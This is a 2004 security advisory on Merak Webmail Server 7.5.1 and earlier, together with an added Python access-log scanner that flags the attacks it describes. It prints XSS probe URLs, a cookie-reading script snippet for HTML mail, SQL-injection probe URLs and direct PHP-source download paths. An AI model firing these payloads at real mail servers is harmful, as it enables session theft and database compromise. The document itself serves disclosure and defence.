[NT] Merak Webmail Server Multiple Vulnerabilities

From: SecuriTeam (support_at_securiteam.com)
Date: 08/19/04

    To: list@securiteam.com
    Date: 19 Aug 2004 11:32:20 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

      Merak Webmail Server Multiple Vulnerabilities
    ------------------------------------------------------------------------

    SUMMARY

    Merak Webmail Server Software
    (http://www.merakmailserver.com/Products/Webmail_Server_Software/)
    "provides users with the ability to access their email via a browser
    using an 'Outlook 2002 or 2003' style interface as well as many others,
    or via their Wireless WAP-enabled device". The Merak Webmail Server has
    been found to contain multiple vulnerabilities: cross-site scripting,
    full path disclosure, exposure of PHP source files, and SQL injection.

    DETAILS

    Vulnerable Systems:
     * Merak Mail Server version 7.5.1 and prior

    Immune Systems:
     * Merak Mail Server version 7.5.2 or newer

    Cross-Site Scripting:
    There are many input validation holes in the Merak Webmail server. An
    attacker can use these holes to perform an XSS attack.

    Examples:
    /address.html?id=[id]&sort=name&selectsort=&global=&showgroups=&showlite=&category=">[XSS]&cserver=&ext=
    /address.html?id=[id]&sort=name&selectsort=&global=&showgroups=&showlite=&category=&cserver=">[XSS]&ext=
    /address.html?id=[id]&sort=name&selectsort=&global=&showgroups=&showlite=&category=&cserver=&ext=">[XSS]
    /address.html?id=[id]&sort=&selectsort=&global=">[XSS]&showgroups=&showlite=&category=&cserver=&ext=
    /address.html?id=[id]&sort=&selectsort=&global=&showgroups=">[XSS]&showlite=&category=&cserver=&ext=
    /address.html?id=[id]&sort=&selectsort=&global=&showgroups=&showlite=">[XSS]&category=&cserver=&ext=
    /settings.html?autoresponder=1&id=[id]&spage=">[XSS]
    /settings.html?autoresponder=">[XSS]&id=[id]&spage=0
    /readmail.html?id=[id]&folder=">[XSS]

    The following files (attachment.html, calendar.html) can be accessed
    without knowing the user's session ID, which makes them easier to use
    for exploitation:
    /attachment.html?attachmentpage_text_error=">[XSS]
    /calendar.html?id=1&schedule=admin%40merakdemo.com&cv=n&folder=">[XSS]
    /calendar.html?id=1&schedule=koko%40merakdemo.com&sf=addevent&cv=d&ct=">[XSS]
    /calendar.html?id=[id]&cv=">[XSS]&ct=[ct]&sf=addevent&ESdhour=8

    It is also possible to inject XSS into messages.

    Example:
    Open your mailbox and write a new message along the lines of:
    < IMG alt="" hspace=0 src="javascript:alert(document.cookie)"
    align=baseline border=0>< IFRAME src="http://www.google.com"></body>
    </html> </IFRAME>

    Click on the HTML message checkbox (in order to send it in HTML format).

    The XSS will be executed in your own browser. If you send the message,
    the XSS will also be executed once the victim reads the email.

    Full Path Disclosure:
    Unexpected values in some variables of address.html trigger PHP warnings
    that reveal the installation path to a remote user.

    Example:
    Accessing the following URL:
    /mail/address.html?id=[id]&sort=criolabs&selectsort=criolabs&global=criolabs&showlite=criolabs&category=criolabs&cserver=&ext=, will return:

    Warning: reset(): Passed variable is not an array or object in C:\Archivos
    de programa\Merak\html\mail\address.html on line 565

    Warning: Variable passed to each() is not an array or object in
    C:\Archivos de programa\Merak\html\mail\address.html on line 566

    Warning: reset(): Passed variable is not an array or object in C:\Archivos
    de programa\Merak\html\mail\inc\function.address.php on line 100

    Warning: Variable passed to each() is not an array or object in
    C:\Archivos de programa\Merak\html\mail\inc\function.address.php on line
    101

    Another example is to access the following URL:
    /calendar.html?id=6213dcc45fdbccc9af207d32722b93a7&cv=%22criolabs&ct='criolabs&sf='criolabs, which will return:

    Warning: mktime(): Windows does not support negative values for this
    function in C:\Archivos de
    programa\Merak\html\mail\inc\function.calendar.php on line 413

    Warning: date(): Windows does not support dates prior to midnight
    (00:00:00), January 1, 1970 in C:\Archivos de
    programa\Merak\html\mail\inc\function.calendar.php on line 413

    Warning: mktime(): Windows does not support negative values for this
    function in C:\Archivos de
    programa\Merak\html\mail\inc\function.calendar.php on line 417

    Warning: mktime(): Windows does not support negative values for this
    function in C:\Archivos de
    programa\Merak\html\mail\inc\function.calendar.php on line 420

    Warning: date(): Windows does not support dates prior to midnight
    (00:00:00), January 1, 1970 in C:\Archivos de
    programa\Merak\html\mail\inc\function.calendar.php on line 420

    Warning: date(): Windows does not support dates prior to midnight
    (00:00:00), January 1, 1970 in C:\Archivos de
    programa\Merak\html\mail\inc\function.calendar.php on line 350

    Exposure of PHP Files:
    The server allows a remote user to download the source of any PHP file
    on the server. Normally a web server executes the content of a PHP file
    rather than allowing it to be downloaded.

    Examples:
    http://localhost:32000/mail/inc/function.php
    http://localhost:32000/mail/inc/function.view.php

    SQL Injection:
    There are numerous SQL injection vulnerabilities in calendar.html. They
    allow a remote user to inject arbitrary SQL commands.

    Examples:
    /calendar.html?id=1'&schedule=[SQL]
    /calendar.html?id=1&schedule=koko%40merakdemo.com&sf=addevent&cv=d&ct=';'&Eid=criolabs'
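    As an added example (not part of the advisory or the vendor's code), a small Python access-log scanner that flags the request patterns described in the XSS, PHP-file exposure and SQL injection sections above: attribute-closing characters in the listed address.html, settings.html, readmail.html, attachment.html and calendar.html parameters, single quotes in the calendar.html parameters, and a 200 response for a direct request to a .php file under mail/inc/. The log lines are constructed samples, and the parameter lists are taken from the example URLs in this advisory.

```python
import re
from urllib.parse import parse_qs, urlsplit
# Scripts/parameters named in the advisory; session id watched only for calendar.html
WATCHED = {
    "address.html": {"sort", "selectsort", "global", "showgroups", "showlite",
                     "category", "cserver", "ext"},
    "settings.html": {"autoresponder", "spage"},
    "readmail.html": {"folder"},
    "attachment.html": {"attachmentpage_text_error"},
    "calendar.html": {"id", "schedule", "sf", "cv", "ct", "folder", "Eid"},
}
XSS_MARKERS = re.compile(r'[<>"]')  # characters that close an HTML attribute or tag
SQLI_MARKERS = re.compile(r"'")     # quote that breaks out of a SQL string literal
# Common Log Format request line: client, timestamp, method, target, status
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+)[^"]*" (?P<status>\d{3})')

def classify_request(target, status):
    """Return (script, param, kind) findings for one request target."""
    parts = urlsplit(target)
    script = parts.path.rsplit("/", 1)[-1]
    findings = []
    # A 200 for an include file under inc/ means its PHP source was served as-is.
    if "/inc/" in parts.path and script.endswith(".php") and status == "200":
        findings.append((script, "-", "php-source-exposure"))
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        if name not in WATCHED.get(script, ()):
            continue
        for value in values:  # parse_qs has already percent-decoded %22, %27 etc.
            if XSS_MARKERS.search(value):
                findings.append((script, name, "xss"))
            if SQLI_MARKERS.search(value):
                findings.append((script, name, "sqli"))
    return findings

def scan_log(lines):
    """Return (ip, script, param, kind) alerts for every suspicious request."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if m is not None:
            for finding in classify_request(m.group("target"), m.group("status")):
                alerts.append((m.group("ip"),) + finding)
    return alerts

# Constructed sample access-log lines (not taken from the advisory).
SAMPLE_LOG = [
    '203.0.113.7 - - [19/Aug/2004:11:32:20 +0200] "GET /mail/address.html?id=abc123&sort=name&category=%22%3E%5BXSS%5D HTTP/1.1" 200 512',
    '203.0.113.7 - - [19/Aug/2004:11:32:21 +0200] "GET /mail/calendar.html?id=1%27&schedule=x HTTP/1.1" 500 88',
    '198.51.100.4 - - [19/Aug/2004:11:33:05 +0200] "GET /mail/inc/function.php HTTP/1.1" 200 9000',
]
```

    Calling scan_log(SAMPLE_LOG) yields one xss, one sqli and one php-source-exposure alert; legitimate values such as folder=Inbox produce none, though a single quote in a real name (for example in the schedule parameter) would also be flagged and needs review.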

    Disclosure Timeline:
    Wed, 04 Aug 2004: Vendor contacted
    Thu, 12 Aug 2004: Release of Merak Mail Server 7.5.2

    Solution:
    Download the new release available at:
    http://www.MerakMailServer.com/Download/

    ADDITIONAL INFORMATION

    The information has been provided by Criolabs staff.
    The original article can be found at:
    http://www.criolabs.net/advisories/Merak.txt
